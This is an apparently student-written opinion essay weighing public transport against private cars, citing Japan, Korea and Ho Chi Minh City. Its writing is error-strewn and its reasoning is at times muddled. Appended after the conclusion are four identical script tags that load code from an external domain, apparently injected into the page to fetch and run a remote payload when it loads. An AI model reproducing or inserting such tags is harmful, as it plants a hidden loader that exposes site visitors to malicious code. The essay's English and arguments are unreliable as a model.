Many people prefer to use public transport while others say that personal cars are the best mode of transportation. Excessive use of private cars is considered to be the main reason for the traffic jam in many cities and that’s why the use of public transportation is encouraged. In your opinion? What are the pros and cons of public transport?

In today’s world, there are many kinds of public transport and especially many people use it. Meanwhile, others think that private cars are the best way. From my perspective, public transport has an important part in our lives because it saves money and is suitable for any living conditions but private cars are still more suitable for people who prefer to go long distances and save money for public transport everyday.

There are several contributing factors to the advantages of public transport. First, public transport is believed to equalize travel opportunities among young people regardless of their family background. This public transport support, presumably, tends not only to increase the overall living standards of lower-income people and especially save their money for paying bills such as water and electricity bills and mitigate their feeling of inferiority or tiredness when they need to drive by themselves after a long day at work, which promotes an active lifestyle society. Second, public transport would result in a reduction of pollution such as air quality and noise damage because people don’t use their own cars and use public transport such as trains or buses or sometimes hire cycling. For example, Japanese or Korean are not the wealthiest nations but there are places where an extensive and well-run network of buses and subways have achieved major success in easing traffic flows despite their huge population. The residents in these countries also praise public transport as a much needed-budget transport option, especially considering the living expanse there are some of the highest in the world, and having to pay for maintenance and parking for their own car on top of the car payments themselves just does not make sense financially for most people.

On the other hand, I suppose there are other bad effects of public transport in this modern world. First, all people using public transport would likely correspond with a tremendous financial strain on a country. Generating no income from car products, companies could become over-reliant on the state budget for funding, meaning that there would be less input to develop other important areas such as healthcare systems and transport infrastructure. Second, public transport would tempt many bad situations especially in a rush hour. People need to wait for a long time to come back home, thereby adding great burdens for traffic jams and having uncomfortable feelings. For instance, Ho Chi Minh city in VietNam always has traffic jams when people use taxis or buses during rush hours.

Apart from the issues mentioned above, some people believe private cars are the best option because they have extremely better emotions even in traffic jams. In addition, having their own cars could help them to spend their money on suitable paths in their lives.

In conclusion, public transport is still the future of transport despite the above limitations. However, having their own cars is still essential for people who prefer convenience and comfort.

<script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script>